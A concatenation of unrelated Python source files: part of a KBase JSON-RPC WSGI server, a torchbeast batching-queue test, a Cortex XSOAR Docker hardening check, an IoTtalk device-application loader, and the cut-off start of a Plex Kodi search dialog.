newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_functional_enrichment_1'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_functional_enrichment_1.run_fe1,
name='kb_functional_enrichment_1.run_fe1',
types=[dict])
self.method_authentication['kb_functional_enrichment_1.run_fe1'] = 'required' # noqa
self.rpc_service.add(impl_kb_functional_enrichment_1.status,
name='kb_functional_enrichment_1.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_functional_enrichment_1 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
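# Minimal usage sketch (port=0 lets the OS assign a free port):
#   port = start_server(newprocess=True)  # returns the bound port
#   ... issue JSON-RPC calls against http://localhost:<port> ...
#   stop_server()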
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
batching_queue_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for actorpool.BatchingQueue.
Basic functionalities of actorpool.BatchingQueue are tested
in libtorchbeast/actorpool_test.cc.
"""
import threading
import time
import unittest
import numpy as np
import torch
import libtorchbeast
class BatchingQueueTest(unittest.TestCase):
def test_bad_construct(self):
with self.assertRaisesRegex(ValueError, "Min batch size must be >= 1"):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=0, maximum_batch_size=1
)
with self.assertRaisesRegex(
ValueError, "Max batch size must be >= min batch size"
):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=1, maximum_batch_size=0
)
def test_multiple_close_calls(self):
queue = libtorchbeast.BatchingQueue()
queue.close()
with self.assertRaisesRegex(RuntimeError, "Queue was closed already"):
queue.close()
def test_check_inputs(self):
queue = libtorchbeast.BatchingQueue(batch_dim=2)
with self.assertRaisesRegex(
ValueError, "Enqueued tensors must have more than batch_dim =="
):
queue.enqueue(torch.ones(5))
with self.assertRaisesRegex(
ValueError, "Cannot enqueue empty vector of tensors"
):
queue.enqueue([])
with self.assertRaisesRegex(
libtorchbeast.ClosedBatchingQueue, "Enqueue to closed queue"
):
queue.close()
queue.enqueue(torch.ones(1, 1, 1))
def test_simple_run(self):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=1, maximum_batch_size=1
)
inputs = torch.zeros(1, 2, 3)
queue.enqueue(inputs)
batch = next(queue)
np.testing.assert_array_equal(batch, inputs)
def test_batched_run(self, batch_size=2):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=batch_size, maximum_batch_size=batch_size
)
inputs = [torch.full((1, 2, 3), i) for i in range(batch_size)]
def enqueue_target(i):
while queue.size() < i:
# Make sure thread i calls enqueue before thread i + 1.
time.sleep(0.05)
queue.enqueue(inputs[i])
enqueue_threads = []
for i in range(batch_size):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
for t in enqueue_threads:
t.start()
batch = next(queue)
np.testing.assert_array_equal(batch, torch.cat(inputs))
for t in enqueue_threads:
t.join()
class BatchingQueueProducerConsumerTest(unittest.TestCase):
def test_many_consumers(
self, enqueue_threads_number=16, repeats=100, dequeue_threads_number=64
):
queue = libtorchbeast.BatchingQueue(batch_dim=0)
lock = threading.Lock()
total_batches_consumed = 0
def enqueue_target(i):
for _ in range(repeats):
queue.enqueue(torch.full((1, 2, 3), i))
def dequeue_target():
nonlocal total_batches_consumed
for batch in queue:
batch_size, *_ = batch.shape
with lock:
total_batches_consumed += batch_size
enqueue_threads = []
for i in range(enqueue_threads_number):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
dequeue_threads = []
for i in range(dequeue_threads_number):
dequeue_threads.append(
threading.Thread(target=dequeue_target, name=f"dequeue-thread-{i}")
)
for t in enqueue_threads + dequeue_threads:
t.start()
for t in enqueue_threads:
t.join()
queue.close()
for t in dequeue_threads:
t.join()
self.assertEqual(total_batches_consumed, repeats * enqueue_threads_number)
if __name__ == "__main__":
unittest.main()
|
DockerHardeningCheck.py
|
import demistomock as demisto
from CommonServerPython import *
from multiprocessing import Process
import resource
import os
import re
import time
def big_string(size):
s = 'a' * 1024
while len(s) < size:
s = s * 2
return len(s)
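# e.g. big_string(3 * 1024) doubles 1024 -> 2048 -> 4096 and returns 4096; the point
# is simply to force a large allocation inside the child process.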
def mem_size_to_bytes(mem: str) -> int:
res = re.match(r'(\d+)\s*([gm])?b?', mem, re.IGNORECASE)
if not res:
raise ValueError("Failed parsing memory string: {}".format(mem))
b = int(res.group(1))
    if res.group(2):
        b = b * 1024 * 1024  # megabytes to bytes
        if res.group(2).lower() == 'g':
            b = b * 1024  # gigabytes: one more factor of 1024
return b
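# Illustrative conversions (not part of the original script): mem_size_to_bytes("512m")
# -> 512 * 1024 * 1024, mem_size_to_bytes("1g") -> 1024 ** 3, and a bare "2048" -> 2048.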
def check_memory(target_mem: str, check_type: str) -> str:
"""Check allocating memory
Arguments:
target_mem {str} -- target memory size. Can specify as 1g 1m and so on
check_type {str} -- How to check either: cgroup (check configuration of cgroup) or allocate (check actual allocation)
Returns:
str -- error string if failed
"""
size = mem_size_to_bytes(target_mem)
if check_type == "allocation":
LOG("starting process to check memory of size: {}".format(size))
p = Process(target=big_string, args=(size, ))
p.start()
p.join()
LOG("memory intensive process status code: {}".format(p.exitcode))
if p.exitcode == 0:
return ("Succeeded allocating memory of size: {}. "
"It seems that you haven't limited the available memory to the docker container.".format(target_mem))
else:
cgroup_file = "/sys/fs/cgroup/memory/memory.limit_in_bytes"
try:
with open(cgroup_file, "r") as f:
mem_bytes = int(f.read().strip())
if mem_bytes > size:
return (f'According to memory cgroup configuration at: {cgroup_file}'
f' available memory in bytes [{mem_bytes}] is larger than {target_mem}')
except Exception as ex:
return (f'Failed reading memory cgroup from: {cgroup_file}. Err: {ex}.'
' You may be running a docker version which does not provide this configuration information.'
' You can try running the memory check with memory_check=allocate as an alternative.')
return ""
def check_pids(pid_num: int) -> str:
LOG("Starting pid check for: {}".format(pid_num))
processes = [Process(target=time.sleep, args=(30, )) for i in range(pid_num)]
try:
for p in processes:
p.start()
time.sleep(0.5)
alive = 0
for p in processes:
if p.is_alive():
alive += 1
if alive >= pid_num:
return ("Succeeded creating processs of size: {}. "
"It seems that you haven't limited the available pids to the docker container.".format(pid_num))
else:
LOG(f'Number of processes that are alive: {alive} is smaller than {pid_num}. All good.')
except Exception as ex:
LOG("Pool startup failed (as expected): {}".format(ex))
finally:
for p in processes:
if p.is_alive():
p.terminate()
p.join()
return ""
def check_fd_limits(soft, hard) -> str:
s, h = resource.getrlimit(resource.RLIMIT_NOFILE)
if s > soft:
return "FD soft limit: {} is above desired limt: {}.".format(s, soft)
if h > hard:
return "FD hard limit: {} is above desired limit: {}.".format(h, hard)
return ""
def check_non_root():
uid = os.getuid()
if uid == 0:
return ("Running as root with uid: {}."
" It seems that you haven't set the docker container to run with a non-root internal user.".format(uid))
return ""
def intensive_calc(iterations: int):
    # Busy-loop over large-integer multiplications to keep one CPU core occupied.
    i = 0
    x = 1
    while i < iterations:
        x = x * 2
        i += 1
    return x
def check_cpus(num_cpus: int) -> str:
iterval = 500 * 1000
processes = [Process(target=intensive_calc, args=(iterval, )) for i in range(num_cpus)]
start = time.time_ns()
for p in processes:
p.start()
for p in processes:
p.join()
runtime = time.time_ns() - start
LOG("cpus check runtime for {} processes time: {}".format(num_cpus, runtime))
processes = [Process(target=intensive_calc, args=(iterval, )) for i in range(num_cpus * 2)]
start = time.time_ns()
for p in processes:
p.start()
for p in processes:
p.join()
runtime2 = time.time_ns() - start
    # runtime2 should be roughly 2x runtime, but we allow a safety margin since the
    # machine itself may be loaded
LOG("cpus check runtime for {} processes time: {}".format(num_cpus * 2, runtime2))
if runtime2 < runtime * 1.5:
return ("CPU processing power increased significantly when increasing processes "
"from: {} (time: {}) to: {} (time: {}). "
"Note: this test may fail even if the proper configuration has been applied and"
" the machine itself is loaded.".format(num_cpus, runtime, num_cpus * 2, runtime2))
return ""
def main():
mem = demisto.args().get('memory', "1g")
mem_check = demisto.args().get('memory_check', "cgroup")
pids = int(demisto.args().get('pids', 256))
fds_soft = int(demisto.args().get('fds_soft', 1024))
fds_hard = int(demisto.args().get('fds_hard', 8192))
cpus = int(demisto.args().get('cpus', 1))
success = "Success"
check = "Check"
status = "Status"
res = [
{
check: "Non-root User",
status: check_non_root() or success,
},
{
check: "Memory",
status: check_memory(mem, mem_check) or success,
},
{
check: "File Descriptors",
status: check_fd_limits(fds_soft, fds_hard) or success,
},
{
check: "CPUs",
status: check_cpus(cpus) or success,
},
{
check: "PIDs",
status: check_pids(pids) or success,
},
]
failed = False
failed_msg = ''
for v in res:
if v[status] != success:
failed = True
v[status] = "Failed: " + v[status]
failed_msg += f'* {v[status]}\n'
table = tableToMarkdown("Docker Hardening Results Check", res, [check, status])
return_outputs(table)
if failed:
return_error(f'Failed verifying docker hardening:\n{failed_msg}'
'More details at: https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-0/cortex-xsoar-admin/docker/docker-hardening-guide.html') # noqa
# Python 2 uses __builtin__; Python 3 uses builtins
if __name__ == "__builtin__" or __name__ == "builtins":
main()
|
dai.py
|
import atexit
import logging
import os.path
import platform
import re
import signal
import sys
import time
from threading import Thread, Event
from uuid import UUID
from iottalkpy.color import DAIColor
from iottalkpy.dan import DeviceFeature, RegistrationError, NoData
from iottalkpy.dan import register, push, deregister
from iottalkpy.utils import cd
log = logging.getLogger(DAIColor.wrap(DAIColor.logger, 'DAI'))
log.setLevel(level=logging.INFO)
_flags = {}
_devices = {}
_interval = {}
try: # Python 3 only
import importlib
import importlib.util
except ImportError:
pass
def push_data(df_name):
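    # Per-feature push loop, run on a daemon thread started by on_signal('CONNECT'):
    # push the feature's latest reading every _interval[df_name] seconds while the
    # feature's flag stays True.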
if not _devices[df_name].push_data:
return
log.debug('%s:%s', df_name, _flags[df_name])
while _flags[df_name]:
_data = _devices[df_name].push_data()
if not isinstance(_data, NoData) and _data is not NoData:
push(df_name, _data)
time.sleep(_interval[df_name])
def on_signal(signal, df_list):
global _flags
log.info('Receive signal: \033[1;33m%s\033[0m, %s', signal, df_list)
if 'CONNECT' == signal:
for df_name in df_list:
if not _flags.get(df_name):
_flags[df_name] = True
t = Thread(target=push_data, args=(df_name,))
t.daemon = True
t.start()
elif 'DISCONNECT' == signal:
for df_name in df_list:
_flags[df_name] = False
    elif 'SUSPEND' == signal:
        # Not used
        pass
    elif 'RESUME' == signal:
        # Not used
        pass
return True
def get_df_function_name(df_name):
return re.sub(r'-O$', '_O', re.sub(r'-I$', '_I', df_name))
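# e.g. get_df_function_name('Dummy_Sensor-I') -> 'Dummy_Sensor_I': only a trailing
# -I/-O is rewritten, so the result is a valid function name in the loaded app module.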
def on_data(df_name, data):
_devices[df_name].on_data(data)
return True
def exit_handler(signal, frame):
sys.exit(0) # this will trigger ``atexit`` callbacks
def _get_device_addr(app):
"""
:return: ``str`` or ``None``
"""
addr = app.__dict__.get('device_addr', None)
if addr is None:
return
if isinstance(addr, UUID):
return str(addr)
try:
UUID(addr)
except ValueError:
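        # not a canonical UUID string; try interpreting it as a hex integer instead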
try:
addr = str(UUID(int=int(addr, 16)))
except ValueError:
            log.warning('Invalid device_addr; falling back to None.')
addr = None
return addr
def _get_persistent_binding(app, device_addr):
"""
:return: bool
"""
x = app.__dict__.get('persistent_binding', False)
if x and device_addr is None:
msg = ('In case of `persistent_binding` set to `True`, '
'the `device_addr` should be set and fixed.')
raise ValueError(msg)
return x
def main(app):
global _devices, _interval
csmapi = app.__dict__.get('api_url')
if csmapi is None:
raise RegistrationError('api_url is required')
device_name = app.__dict__.get('device_name')
if device_name is None:
pass
# raise RegistrationError('device_name not given.')
device_model = app.__dict__.get('device_model')
if device_model is None:
raise RegistrationError('device_model not given.')
device_addr = _get_device_addr(app)
persistent_binding = _get_persistent_binding(app, device_addr)
# callbacks
register_callback = app.__dict__.get('register_callback')
on_register = app.__dict__.get('on_register')
on_deregister = app.__dict__.get('on_deregister')
on_connect = app.__dict__.get('on_connect')
on_disconnect = app.__dict__.get('on_disconnect')
idfs = app.__dict__.get('idf_list', [])
odfs = app.__dict__.get('odf_list', [])
username = app.__dict__.get('username')
extra_setup_webpage = app.__dict__.get('extra_setup_webpage', '')
device_webpage = app.__dict__.get('device_webpage', '')
_push_interval = app.__dict__.get('push_interval', 1)
_interval = app.__dict__.get('interval', {})
if not idfs and not odfs:
        raise RegistrationError('Both idf_list and odf_list are empty; at least one is required.')
idf_list = []
for df_profile in idfs:
if isinstance(df_profile, str):
_devices[df_profile] = DeviceFeature(df_name=df_profile)
_devices[df_profile].push_data = app.__dict__.get(get_df_function_name(df_profile))
idf_list.append(_devices[df_profile].profile())
# check push data interval
if not _interval.get(df_profile):
_interval[df_profile] = _push_interval
elif isinstance(df_profile, tuple) and len(df_profile) == 2:
_devices[df_profile[0]] = DeviceFeature(df_name=df_profile[0],
df_type=df_profile[1])
_devices[df_profile[0]].push_data = app.__dict__.get(get_df_function_name(df_profile[0]))
idf_list.append(_devices[df_profile[0]].profile())
# check push data interval
if not _interval.get(df_profile[0]):
_interval[df_profile[0]] = _push_interval
else:
raise RegistrationError('unknown idf_list, usage: [df_name, ...]')
odf_list = []
for df_profile in odfs:
if isinstance(df_profile, str):
_devices[df_profile] = DeviceFeature(df_name=df_profile)
_devices[df_profile].on_data = app.__dict__.get(get_df_function_name(df_profile))
odf_list.append(_devices[df_profile].profile())
elif isinstance(df_profile, tuple) and len(df_profile) == 2:
_devices[df_profile[0]] = DeviceFeature(df_name=df_profile[0],
df_type=df_profile[1])
_devices[df_profile[0]].on_data = app.__dict__.get(get_df_function_name(df_profile[0]))
odf_list.append(_devices[df_profile[0]].profile())
else:
raise RegistrationError('unknown odf_list, usage: [df_name, ...]')
def f():
global _flags
for key in _flags:
_flags[key] = False
log.debug('on_disconnect: _flag = %s', str(_flags))
if on_disconnect:
return on_disconnect()
context = register(
csmapi,
on_signal=on_signal,
on_data=on_data,
accept_protos=['mqtt'],
id_=device_addr,
idf_list=idf_list,
odf_list=odf_list,
name=device_name,
profile={
'model': device_model,
'u_name': username,
'extra_setup_webpage': extra_setup_webpage,
'device_webpage': device_webpage,
},
register_callback=register_callback,
on_register=on_register,
on_deregister=on_deregister,
on_connect=on_connect,
on_disconnect=f
)
if not persistent_binding:
atexit.register(deregister)
signal.signal(signal.SIGTERM, exit_handler)
signal.signal(signal.SIGINT, exit_handler)
log.info('Press Ctrl+C to exit DAI.')
if platform.system() == 'Windows' or sys.version_info.major == 2:
# workaround for https://bugs.python.org/issue35935
while True:
time.sleep(86400)
else:
Event().wait() # wait for SIGINT
def load_module(fname):
if sys.version_info.major > 2: # python 3+
if fname.endswith('.py'):
# https://stackoverflow.com/a/67692
if sys.version_info >= (3, 5):
spec = importlib.util.spec_from_file_location('ida', fname)
ida = importlib.util.module_from_spec(spec)
spec.loader.exec_module(ida)
else: # case of python 3.4
# this import only for python 3.4-
from importlib.machinery import SourceFileLoader
ida = SourceFileLoader('ida', fname).load_module()
else:
fname = os.path.normpath(fname)
m = fname[1:] if fname.startswith('/') else fname
# mapping ``my/path/ida`` to ``my.path.ida``
m = '.'.join(m.split(os.path.sep))
# well, seems we need to hack sys.path
if fname.startswith('/'):
with cd('/'):
sys.path.append(os.getcwd())
                    ida = importlib.import_module(m)
else:
sys.path.append(os.getcwd())
ida = importlib.import_module(m)
sys.path.pop()
return ida
else: # in case of python 2, only single file is supported
if os.path.isdir(fname):
raise RuntimeError(
"Only single file loading is supported in Python 2")
class App(object):
def __init__(self, d):
self.__dict__ = d
d = {}
        with open(fname) as f:
            # exec a string rather than the file object; file objects only worked
            # with the Python 2 exec statement
            exec(f.read(), d)
return App(d)
if __name__ == '__main__':
main(load_module(sys.argv[1] if len(sys.argv) > 1 else 'ida'))
|
search.py
|
import time
import threading
import xbmcgui
import kodigui
import opener
import windowutils
from lib import util
from lib.kodijsonrpc import rpc
from plexnet import plexapp
class SearchDialog(kodigui.BaseDialog, windowutils.UtilMixin):
xmlFile = 'script-plex-search.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
res = '1080i'
width = 1920
height = 1080
LETTERS = 'abcdefghijklmnopqrstuvwxyz0123456789 '
SECTION_BUTTONS = {
901: 'all',
902: 'movie',
903: 'show',
904: 'artist',
905: 'photo'
}
HUB_POSTER_00 = 2100
HUB_SQUARE_01 = 2101
HUB_AR16X9_02 = 2102
HUB_CIRCLE_03 = 2103
HUB_POSTER_04 = 2104
HUB_SQUARE_05 = 2105
HUB_AR16X9_06 = 2106
HUB_CIRCLE_07 = 2107
HUB_POSTER_08 = 2108
HUB_SQUARE_09 = 2109
HUB_AR16X9_10 = 2110
HUB_CIRCLE_11 = 2111
HUB_POSTER_12 = 2112
HUB_SQUARE_13 = 2113
HUB_AR16X9_14 = 2114
HUB_CIRCLE_15 = 2115
HUB_POSTER_16 = 2116
HUB_SQUARE_17 = 2117
HUB_AR16X9_18 = 2118
HUB_CIRCLE_19 = 2119
HUB_POSTER_20 = 2120
HUB_SQUARE_21 = 2121
HUB_AR16X9_22 = 2122
HUB_CIRCLE_23 = 2123
HUB_POSTER_24 = 2124
HUB_SQUARE_25 = 2125
HUB_AR16X9_26 = 2126
HUB_CIRCLE_27 = 2127
HUB_POSTER_28 = 2128
HUB_SQUARE_29 = 2129
HUB_AR16X9_30 = 2130
HUB_CIRCLE_31 = 2131
HUB_POSTER_32 = 2132
HUB_SQUARE_33 = 2133
HUB_AR16X9_34 = 2134
HUB_CIRCLE_35 = 2135
HUB_POSTER_36 = 2136
HUB_SQUARE_37 = 2137
HUB_AR16X9_38 = 2138
HUB_CIRCLE_39 = 2139
HUB_POSTER_40 = 2140
HUB_SQUARE_41 = 2141
HUB_AR16X9_42 = 2142
HUB_CIRCLE_43 = 2143
HUB_POSTER_44 = 2144
HUB_SQUARE_45 = 2145
HUB_AR16X9_46 = 2146
HUB_CIRCLE_47 = 2147
HUBMAP = {
'track': {'type': 'square'},
'episode': {'type': 'ar16x9'},
'movie': {'type': 'poster'},
'show': {'type': 'poster'},
'artist': {'type': 'square'},
'album': {'type': 'square'},
